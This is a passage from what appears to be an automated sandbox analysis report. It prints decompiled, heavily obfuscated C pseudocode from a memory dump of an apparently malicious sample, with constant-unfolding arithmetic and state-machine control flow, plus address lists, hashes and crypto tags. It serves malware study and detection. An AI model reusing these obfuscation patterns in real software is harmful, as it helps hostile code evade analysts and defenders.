				_v8 = _v8 / _t85;
				_v8 = _v8 + 0xffffb56c;
				_v8 = _v8 ^ 0xffffa5a2;
				_a4 = 0x6ea8;
				_a4 = _a4 | 0xeb58ef4a;
				_a4 = _a4 << 6;
				_t86 = 0x7d;
				_a4 = _a4 / _t86;
				_a4 = _a4 ^ 0x01b6ec6f;
				_v16 = 0xf7ce;
				_v16 = _v16 + 0xffffb713;
				_v16 = _v16 + 0xe2af;
				_v16 = _v16 ^ 0x0001a1e1;
				_v12 = 0x7f90;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x9419cfce;
				_v12 = _v12 ^ 0x9419fbb9;
				_a8 = 0xab6f;
				_a8 = _a8 * 0x2a;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 | 0x38dd753e;
				_a8 = _a8 ^ 0x38dd1846;
				E0022360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
				E00222674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
				_t83 =  *((intOrPtr*)(_t97 + 4));
				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
				return _t83;
			}

0x0021799f
0x002179a3
0x002179a6
0x002179a9
0x002179aa
0x002179ad
0x002179b2
0x002179bb
0x002179bf
0x002179c6
0x002179cd
0x002179d4
0x002179db
0x002179e7
0x002179ec
0x002179f1
0x002179f8
0x002179ff
0x00217a06
0x00217a0d
0x00217a14
0x00217a19
0x00217a1c
0x00217a23
0x00217a2a
0x00217a31
0x00217a38
0x00217a3f
0x00217a46
0x00217a4a
0x00217a51
0x00217a58
0x00217a63
0x00217a66
0x00217a6a
0x00217a71
0x00217a84
0x00217a9d
0x00217aa2
0x00217aa8
0x00217ab0

Strings

JX, xrefs: 00217A06
[m1, xrefs: 002179D4

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: [m1$JX
API String ID: 0-848362422
Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction ID: 0bad90a5a0b512111010e33512850ba6456716348ec2aebe0e4bc3705212d70e
Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction Fuzzy Hash: 84310376900209FBCF58CFA5D94A8DEBBB5FF44314F20C059E9196A260D3799B64DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00219A37, Relevance: 1.6, Strings: 1, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00219A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v196;
				void* _t297;
				signed int _t335;
				signed int* _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				char* _t354;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t386;

				_push(_a8);
				_t340 = __edx;
				_t380 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t297);
				_v24 = 0xc44;
				_t383 = _t382 + 0x10;
				_v24 = _v24 << 2;
				_v24 = _v24 << 5;
				_t381 = 0x108b8bb2;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x0003068b;
				_v96 = 0x3b9e;
				_v96 = _v96 ^ 0x893884c8;
				_v96 = _v96 ^ 0x89388972;
				_v48 = 0x8b0e;
				_v48 = _v48 << 6;
				_v48 = _v48 + 0xffffd606;
				_t342 = 0x6d;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x0e30afa5;
				_v76 = 0xbb1c;
				_v76 = _v76 + 0xffff2a80;
				_v76 = _v76 | 0x384e25df;
				_v76 = _v76 ^ 0xffffbccb;
				_v68 = 0x817b;
				_v68 = _v68 + 0xb36b;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x00761722;
				_v112 = 0x78f7;
				_v112 = _v112 + 0xabd9;
				_v112 = _v112 ^ 0x00010bcc;
				_v64 = 0xef7a;
				_v64 = _v64 * 0x6b;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0001bb5c;
				_v104 = 0x32c;
				_v104 = _v104 << 5;
				_v104 = _v104 ^ 0x00002d3d;
				_v52 = 0x7426;
				_v52 = _v52 * 0x5d;
				_v52 = _v52 ^ 0xa80e6da6;
				_v52 = _v52 / _t342;
				_v52 = _v52 ^ 0x018aaa04;
				_v12 = 0xd0fb;
				_t343 = 0x6a;
				_v12 = _v12 / _t343;
				_v12 = _v12 + 0xffff7920;
				_v12 = _v12 + 0xffff83ce;
				_v12 = _v12 ^ 0xfffec2a6;
				_v108 = 0xe89;
				_v108 = _v108 + 0x85a8;
				_v108 = _v108 ^ 0x0000adac;
				_v92 = 0xd004;
				_v92 = _v92 + 0xffff90ab;
				_v92 = _v92 | 0x2bfbb4c5;
				_v92 = _v92 ^ 0x2bfba16d;
				_v8 = 0x51d1;
				_v8 = _v8 ^ 0x91ec542a;
				_v8 = _v8 | 0xbd5d6296;
				_v8 = _v8 + 0xe80e;
				_v8 = _v8 ^ 0xbdfe1041;
				_v40 = 0xc5fc;
				_v40 = _v40 | 0x331e7523;
				_v40 = _v40 + 0xc476;
				_v40 = _v40 | 0xe5b13554;
				_v40 = _v40 ^ 0xf7bfa45a;
				_v116 = 0x6d98;
				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x000044aa;
				_v88 = 0x7357;
				_v88 = _v88 + 0x7cff;
				_t344 = 0x6e;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x0022e11b;
				_v56 = 0x39e0;
				_v56 = _v56 + 0xffffb0fb;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0xfffab6b2;
				_v44 = 0x2257;
				_v44 = _v44 / _t344;
				_v44 = _v44 + 0x17fe;
				_v44 = _v44 + 0xffff4b8e;
				_v44 = _v44 ^ 0xffff3a3c;
				_v16 = 0xac11;
				_t345 = 0xd;
				_v16 = _v16 / _t345;
				_t346 = 0x22;
				_v16 = _v16 / _t346;
				_v16 = _v16 + 0xffff8051;
				_v16 = _v16 ^ 0xffffec84;
				_v32 = 0x207e;
				_v32 = _v32 + 0xffff85d9;
				_v32 = _v32 | 0x92dc0f10;
				_t347 = 0x3d;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 ^ 0xffe76a4a;
				_v72 = 0xf5a4;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0x6505;
				_v72 = _v72 ^ 0x01ebcff4;
				_v124 = 0xf81;
				_v124 = _v124 + 0x174a;
				_v124 = _v124 ^ 0x00005562;
				_v80 = 0xd566;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xb30025af;
				_v20 = 0xd4e9;
				_v20 = _v20 ^ 0x0ea0d6e7;
				_v20 = _v20 / _t347;
				_v20 = _v20 | 0xf8279f10;
				_v20 = _v20 ^ 0xf83fc9b3;
				_v100 = 0xda9a;
				_v100 = _v100 * 3;
				_v100 = _v100 ^ 0x0002f5f9;
				_v36 = 0x78aa;
				_v36 = _v36 + 0x4117;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x25804fa7;
				_v36 = _v36 ^ 0x25803510;
				_v28 = 0x20d5;
				_v28 = _v28 + 0xfab3;
				_v28 = _v28 | 0xa4f7c20c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x149e8671;
				_v60 = 0x9445;
				_v60 = _v60 | 0xc2ce9f5c;
				_v60 = _v60 ^ 0x46e2878d;
				_v60 = _v60 ^ 0x842c5375;
				_v120 = 0x3512;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x006a5627;
				_v84 = 0xeb51;
				_v84 = _v84 * 0x42;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x000027de;
				goto L1;
				do {
					while(1) {
						L1:
						_t386 = _t381 - 0x1e9793a2;
						if(_t386 > 0) {
							break;
						}
						if(_t386 == 0) {
							E00217998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
							_t383 = _t383 + 0xc;
							_t381 = 0x39ecd3df;
							continue;
						} else {
							if(_t381 == 0xaa31e0c) {
								E00217998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
								_t383 = _t383 + 0xc;
								_t381 = 0x1e9793a2;
								continue;
							} else {
								if(_t381 == 0x108b8bb2) {
									 *_t340 =  *_t340 & 0x00000000;
									_t381 = 0x23e4e38d;
									_t340[1] = _t340[1] & 0x00000000;
									continue;
								} else {
									if(_t381 == 0x15969886) {
										_t354 =  &_v196;
										E0022360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
										_t383 = _t383 + 0xc;
										_t381 = 0x15fd630a;
										continue;
									} else {
										if(_t381 == 0x15fd630a) {
											_t354 =  &_v196;
											E0022360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
											_t383 = _t383 + 0xc;
											_t381 = 0x2ea6dd43;
											continue;
										} else {
											if(_t381 == 0x18d3ef4a) {
												_push(_t354);
												_t335 = E00218736(_t340[1]);
												 *_t340 = _t335;
												_t354 = _t354;
												__eflags = _t335;
												if(__eflags != 0) {
													_t381 = 0x22e1be53;
													continue;
												}
											} else {
												if(_t381 != 0x1a35bcc9) {
													goto L28;
												} else {
													_t354 =  &_v196;
													E0022360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
													_t383 = _t383 + 0xc;
													_t381 = 0xaa31e0c;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						__eflags =  *_t340;
						_t282 =  *_t340 != 0;
						__eflags = _t282;
						return 0 | _t282;
					}
					__eflags = _t381 - 0x22e1be53;
					if(_t381 == 0x22e1be53) {
						E002250F2( &_v196, _v76, _v68, _v112, _t340);
						_t383 = _t383 + 0xc;
						_t381 = 0x2d15c716;
						goto L28;
					} else {
						__eflags = _t381 - 0x23e4e38d;
						if(_t381 == 0x23e4e38d) {
							_t340[1] = E00227F1F(_t380);
							_t381 = 0x18d3ef4a;
							goto L1;
						} else {
							__eflags = _t381 - 0x2d15c716;
							if(__eflags == 0) {
								E00217998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
								_t383 = _t383 + 0xc;
								_t381 = 0x15969886;
								goto L1;
							} else {
								__eflags = _t381 - 0x2ea6dd43;
								if(_t381 == 0x2ea6dd43) {
									E0022360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
									_t383 = _t383 + 0xc;
									_t381 = 0x1a35bcc9;
									goto L1;
								} else {
									__eflags = _t381 - 0x39ecd3df;
									if(_t381 != 0x39ecd3df) {
										goto L28;
									} else {
										E0022360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
									}
								}
							}
						}
					}
					goto L23;
					L28:
					__eflags = _t381 - 0x1d48367e;
				} while (__eflags != 0);
				goto L23;
			}

0x00219a43
0x00219a46
0x00219a48
0x00219a4a
0x00219a4d
0x00219a4e
0x00219a4f
0x00219a54
0x00219a5b
0x00219a5e
0x00219a64
0x00219a68
0x00219a6d
0x00219a70
0x00219a77
0x00219a7e
0x00219a85
0x00219a8c
0x00219a93
0x00219a97
0x00219aa4
0x00219aa7
0x00219aaa
0x00219ab1
0x00219ab8
0x00219abf
0x00219ac6
0x00219acd
0x00219ad4
0x00219adf
0x00219ae2
0x00219ae9
0x00219af0
0x00219af7
0x00219afe
0x00219b09
0x00219b0c
0x00219b10
0x00219b17
0x00219b1e
0x00219b22
0x00219b29
0x00219b34
0x00219b37
0x00219b45
0x00219b48
0x00219b4f
0x00219b59
0x00219b5c
0x00219b5f
0x00219b66
0x00219b6d
0x00219b74
0x00219b7b
0x00219b82
0x00219b89
0x00219b90
0x00219b97
0x00219b9e
0x00219ba5
0x00219bac
0x00219bb3
0x00219bba
0x00219bc1
0x00219bc8
0x00219bcf
0x00219bd6
0x00219bdf
0x00219be6
0x00219bed
0x00219bf4
0x00219bf8
0x00219bff
0x00219c06
0x00219c13
0x00219c16
0x00219c19
0x00219c20
0x00219c27
0x00219c2e
0x00219c32
0x00219c39
0x00219c47
0x00219c4a
0x00219c51
0x00219c58
0x00219c5f
0x00219c69
0x00219c6e
0x00219c76
0x00219c7b
0x00219c80
0x00219c87
0x00219c8e
0x00219c95
0x00219c9c
0x00219ca7
0x00219ca8
0x00219cab
0x00219cb2
0x00219cb9
0x00219cbd
0x00219cc4
0x00219ccb
0x00219cd2
0x00219cd9
0x00219ce0
0x00219ce7
0x00219ceb
0x00219cef
0x00219cf6
0x00219cfd
0x00219d09
0x00219d0c
0x00219d13
0x00219d1a
0x00219d25
0x00219d28
0x00219d2f
0x00219d36
0x00219d3d
0x00219d41
0x00219d48
0x00219d4f
0x00219d56
0x00219d5d
0x00219d64
0x00219d68
0x00219d6f
0x00219d76
0x00219d7d
0x00219d84
0x00219d8b
0x00219d92
0x00219d96
0x00219d9d
0x00219da8
0x00219dab
0x00219daf
0x00219daf
0x00219db6
0x00219db6
0x00219db6
0x00219db6
0x00219dbc
0x00000000
0x00000000
0x00219dc2
0x00219ee5
0x00219eea
0x00219eed
0x00000000
0x00219dc8
0x00219dce
0x00219ebf
0x00219ec4
0x00219ec7
0x00000000
0x00219dd4
0x00219dda
0x00219e9a
0x00219e9d
0x00219ea2
0x00000000
0x00219de0
0x00219de6
0x00219e79
0x00219e88
0x00219e8d
0x00219e90
0x00000000
0x00219dec
0x00219df2
0x00219e55
0x00219e64
0x00219e69
0x00219e6c
0x00000000
0x00219df4
0x00219dfa
0x00219e32
0x00219e37
0x00219e3c
0x00219e3f
0x00219e40
0x00219e42
0x00219e48
0x00000000
0x00219e48
0x00219dfc
0x00219e02
0x00000000
0x00219e08
0x00219e0b
0x00219e1a
0x00219e1f
0x00219e22
0x00000000
0x00219e22
0x00219e02
0x00219dfa
0x00219df2
0x00219de6
0x00219dda
0x00219dce
0x00219f45
0x00219f47
0x00219f4b
0x00219f4b
0x00219f52
0x00219f52
0x00219ef7
0x00219efd
0x00219fbe
0x00219fc3
0x00219fc6
0x00000000
0x00219f03
0x00219f03
0x00219f09
0x00219fa1
0x00219fa4
0x00000000
0x00219f0f
0x00219f0f
0x00219f15
0x00219f88
0x00219f8d
0x00219f90
0x00000000
0x00219f17
0x00219f17
0x00219f1d
0x00219f65
0x00219f6a
0x00219f6d
0x00000000
0x00219f1f
0x00219f1f
0x00219f25
0x00000000
0x00219f2b
0x00219f3d
0x00219f42
0x00219f25
0x00219f1d
0x00219f15
0x00219f09
0x00000000
0x00219fcb
0x00219fcb
0x00219fcb
0x00000000

Strings

'Vj, xrefs: 00219D96

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 'Vj
API String ID: 0-2210790371
Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction ID: 2964972c5f74187f6bade01eab05eef0982fe82b3fa8d648a1dbfabff786e9ef
Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction Fuzzy Hash: 1AF14372C10319EBDF28CFE5D98A9DEBBB1BB10314F248159D416BA2A0D3B41A96CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00221BDF, Relevance: 1.5, Strings: 1, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00221BDF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t303;
				void* _t311;
				void* _t314;
				void* _t315;
				intOrPtr _t347;
				void* _t348;
				short* _t349;
				void* _t350;
				short* _t351;
				short* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				void* _t365;

				_t347 =  *0x22ca2c; // 0x558300
				_v48 = 0xd714;
				_t348 = _t347 + 0x230;
				_v48 = _v48 ^ 0xcd668ab2;
				_t315 = 0x3a31b660;
				_v48 = _v48 | 0x2f181106;
				_v48 = _v48 ^ 0xef7e1823;
				_v84 = 0x5d44;
				_t353 = 0x2d;
				_v84 = _v84 / _t353;
				_v84 = _v84 ^ 0x00001499;
				_v28 = 0xf70b;
				_t354 = 0xd;
				_v28 = _v28 / _t354;
				_v28 = _v28 | 0x6a0646bd;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x35037bad;
				_v24 = 0xed7c;
				_v24 = _v24 + 0xffff8d1e;
				_v24 = _v24 + 0xffff0c72;
				_t355 = 0x48;
				_v24 = _v24 / _t355;
				_v24 = _v24 ^ 0x038e22ac;
				_v64 = 0x5fc5;
				_v64 = _v64 >> 4;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x000058c3;
				_v92 = 0x2688;
				_v92 = _v92 | 0xea27999c;
				_v92 = _v92 ^ 0xea278961;
				_v96 = 0x4a14;
				_t356 = 0x1f;
				_v96 = _v96 / _t356;
				_v96 = _v96 ^ 0x0000119a;
				_v36 = 0xd568;
				_v36 = _v36 ^ 0xbcd770ac;
				_v36 = _v36 << 6;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xe97134d4;
				_v68 = 0xedd2;
				_t357 = 0x63;
				_v68 = _v68 * 0x5e;
				_v68 = _v68 + 0xde9c;
				_v68 = _v68 ^ 0x00587d35;
				_v32 = 0x24d4;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2e569407;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x9e03fcb0;
				_v104 = 0x1c4d;
				_v104 = _v104 + 0xfffffff9;
				_v104 = _v104 ^ 0x00005633;
				_v40 = 0xb450;
				_v40 = _v40 + 0x94db;
				_v40 = _v40 | 0x3dcacfe3;
				_v40 = _v40 / _t357;
				_v40 = _v40 ^ 0x009f9709;
				_v100 = 0x6d07;
				_t358 = 0x45;
				_v100 = _v100 * 0x69;
				_v100 = _v100 ^ 0x002cf62e;
				_v72 = 0x5e87;
				_v72 = _v72 / _t358;
				_v72 = _v72 + 0xffff9f14;
				_v72 = _v72 ^ 0xffffe852;
				_v56 = 0x964f;
				_v56 = _v56 << 0xd;
				_v56 = _v56 + 0x58a7;
				_v56 = _v56 ^ 0x12ca7579;
				_v8 = 0x11e7;
				_t359 = 0x26;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 7;
				_v8 = _v8 / _t359;
				_v8 = _v8 ^ 0x001dbdc0;
				_v52 = 0x5afe;
				_t360 = 0x23;
				_v52 = _v52 * 0x24;
				_v52 = _v52 / _t360;
				_v52 = _v52 ^ 0x00001a55;
				_v88 = 0xb83d;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x00006413;
				_v20 = 0x5af3;
				_t361 = 0x3a;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 + 0x6d49;
				_v20 = _v20 ^ 0x8eb5ed48;
				_v20 = _v20 ^ 0x8e93dded;
				_v16 = 0x70c;
				_v16 = _v16 / _t361;
				_v16 = _v16 + 0xffff5089;
				_v16 = _v16 | 0x770f0b4d;
				_v16 = _v16 ^ 0xffff12de;
				_v60 = 0xa79c;
				_v60 = _v60 | 0xbac1c5ec;
				_v60 = _v60 + 0x6b12;
				_v60 = _v60 ^ 0xbac228f9;
				_v12 = 0x5546;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x001372eb;
				_v80 = 0x25db;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 3;
				_v80 = _v80 ^ 0x25db4552;
				_v44 = 0xe1b0;
				_v44 = _v44 + 0xffff2f0e;
				_v44 = _v44 | 0x46f5308b;
				_v44 = _v44 * 0x56;
				_v44 = _v44 ^ 0xd65e5bab;
				_v108 = 0x5856;
				_v108 = _v108 ^ 0x78cd5bef;
				_v108 = _v108 ^ 0x78cd26cd;
				_v76 = 0xfba5;
				_v76 = _v76 + 0xffff77ce;
				_t362 = 0x11;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x00005641;
				_t314 = 2;
				do {
					while(_t315 != 0x1de3f48) {
						if(_t315 == 0x1f19b69e) {
							_t363 = E002178A5(_t315, _t315, 0x10, _t315, 4);
							E00217787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
							_t350 = _t348 + _t314;
							E00217787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
							_t365 = _t365 + 0x40;
							_t351 = _t350 + _t363 * 2;
							_t315 = 0x344e60d4;
							_t303 = 0x5c;
							 *_t351 = _t303;
							_t348 = _t351 + _t314;
							continue;
						} else {
							if(_t315 == 0x344e60d4) {
								_t364 = E002178A5(_t315, _t315, 0x10, _t315, 4);
								E00217787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
								_t365 = _t365 + 0x28;
								_t352 = _t348 + _t364 * 2;
								_t315 = 0x1de3f48;
								_t311 = 0x2e;
								 *_t352 = _t311;
								_t348 = _t352 + _t314;
								continue;
							} else {
								if(_t315 == 0x3a31b660) {
									_t311 = E00228C8F(_t315);
									_v112 = _t311;
									_t315 = 0x1f19b69e;
									continue;
								}
							}
						}
						goto L9;
					}
					E00217787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
					_t349 = _t348 + 6;
					_t365 = _t365 + 0x18;
					_t315 = 0x2228f3b5;
					 *_t349 = 0;
					_t348 = _t349 + _t314;
					L9:
				} while (_t315 != 0x2228f3b5);
				return _t311;
			}

0x00221be8
0x00221bf0
0x00221bf7
0x00221bfd
0x00221c04
0x00221c09
0x00221c10
0x00221c17
0x00221c23
0x00221c28
0x00221c2d
0x00221c34
0x00221c3e
0x00221c43
0x00221c48
0x00221c4f
0x00221c52
0x00221c59
0x00221c60
0x00221c67
0x00221c71
0x00221c76
0x00221c7b
0x00221c82
0x00221c89
0x00221c8d
0x00221c90
0x00221c97
0x00221c9e
0x00221ca5
0x00221cac
0x00221cb6
0x00221cbb
0x00221cc0
0x00221cc7
0x00221cce
0x00221cd5
0x00221cd9
0x00221cdd
0x00221ce4
0x00221cef
0x00221cf0
0x00221cf3
0x00221cfa
0x00221d01
0x00221d08
0x00221d0c
0x00221d13
0x00221d17
0x00221d1e
0x00221d25
0x00221d29
0x00221d30
0x00221d37
0x00221d3e
0x00221d4a
0x00221d4d
0x00221d54
0x00221d63
0x00221d66
0x00221d69
0x00221d70
0x00221d7e
0x00221d81
0x00221d88
0x00221d8f
0x00221d96
0x00221d9a
0x00221da1
0x00221da8
0x00221db3
0x00221db6
0x00221db9
0x00221dc4
0x00221dc7
0x00221dce
0x00221dd9
0x00221ddc
0x00221de6
0x00221de9
0x00221df0
0x00221df7
0x00221dfb
0x00221e02
0x00221e0d
0x00221e0e
0x00221e11
0x00221e18
0x00221e1f
0x00221e26
0x00221e32
0x00221e35
0x00221e3c
0x00221e43
0x00221e4a
0x00221e51
0x00221e58
0x00221e5f
0x00221e66
0x00221e6d
0x00221e71
0x00221e79
0x00221e7c
0x00221e83
0x00221e8a
0x00221e8e
0x00221e92
0x00221e99
0x00221ea0
0x00221ea7
0x00221eb2
0x00221eb5
0x00221ebc
0x00221ec3
0x00221eca
0x00221ed1
0x00221ed8
0x00221ee6
0x00221eeb
0x00221eee
0x00221ef5
0x00221ef6
0x00221ef6
0x00221f08
0x00221f99
0x00221fac
0x00221fb1
0x00221fc8
0x00221fcd
0x00221fd0
0x00221fd3
0x00221fda
0x00221fdb
0x00221fde
0x00000000
0x00221f0a
0x00221f10
0x00221f4e
0x00221f61
0x00221f66
0x00221f69
0x00221f6c
0x00221f73
0x00221f74
0x00221f77
0x00000000
0x00221f12
0x00221f18
0x00221f24
0x00221f29
0x00221f2c
0x00000000
0x00221f2c
0x00221f18
0x00221f10
0x00000000
0x00221f08
0x00221ffb
0x00222000
0x00222005
0x00222008
0x0022200d
0x00222010
0x00222012
0x00222012
0x00222024

Strings

5}X, xrefs: 00221CFA

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 5}X
API String ID: 0-583016468
Opcode ID: 627471f1a9b152b42aff6a8c025c093583620fc322688f1ac0bd839d076f224b
Instruction ID: 792b9b73c7abb77cc9b96dff1022fc01f5f9295bd4f26beb24dcc6148e7d76c4
Opcode Fuzzy Hash: 627471f1a9b152b42aff6a8c025c093583620fc322688f1ac0bd839d076f224b
Instruction Fuzzy Hash: D3D12271D10319EBDB18CFE5D98A9DEBBB1FF44314F208019E112BA2A0D7B91A56CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002162A3, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002162A3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				char _v1128;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t190;
				intOrPtr _t206;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;

				_v88 = 0xf2dad;
				_t209 = 0;
				_t190 = 0x374ac1da;
				_v84 = _v84 & 0;
				_v40 = 0xb12b;
				_v40 = _v40 << 0xe;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000058bc;
				_v60 = 0xf727;
				_t210 = 0x4f;
				_v60 = _v60 / _t210;
				_v60 = _v60 ^ 0x00007065;
				_v8 = 0x9eec;
				_v8 = _v8 + 0xd770;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x00000fb6;
				_v44 = 0x7887;
				_v44 = _v44 << 5;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00001109;
				_v16 = 0xef0c;
				_t211 = 0x7a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xca26cbdc;
				_v16 = _v16 | 0x7bdc5f23;
				_v16 = _v16 ^ 0xfbfc55fd;
				_v76 = 0xd8b4;
				_v76 = _v76 + 0x9c32;
				_v76 = _v76 ^ 0x00017966;
				_v36 = 0x1b76;
				_v36 = _v36 + 0x8638;
				_v36 = _v36 | 0x465c0394;
				_v36 = _v36 ^ 0x465cdef1;
				_v28 = 0xf8c7;
				_v28 = _v28 ^ 0x90f840f6;
				_v28 = _v28 / _t211;
				_v28 = _v28 ^ 0x01300a73;
				_v80 = 0x4878;
				_v80 = _v80 ^ 0xf33f81bb;
				_v80 = _v80 ^ 0xf33fed7c;
				_v12 = 0x5e32;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xb939d170;
				_v12 = _v12 + 0xffffe46d;
				_v12 = _v12 ^ 0xb939c5f3;
				_v72 = 0xdcc7;
				_t212 = 5;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00000998;
				_v52 = 0xf409;
				_v52 = _v52 >> 7;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x00002b61;
				_v20 = 0x5cd8;
				_v20 = _v20 + 0x5908;
				_v20 = _v20 * 0x1c;
				_v20 = _v20 * 0x14;
				_v20 = _v20 ^ 0x018d9ab8;
				_v32 = 0x162d;
				_v32 = _v32 + 0xffff1b5c;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x1fff9926;
				_v64 = 0x95af;
				_v64 = _v64 + 0xffff7063;
				_v64 = _v64 ^ 0x00004670;
				_v56 = 0xeead;
				_v56 = _v56 + 0xffffd284;
				_v56 = _v56 ^ 0x94a6c65a;
				_v56 = _v56 ^ 0x94a662be;
				_v68 = 0xa18;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x0000400d;
				_v48 = 0xd4d3;
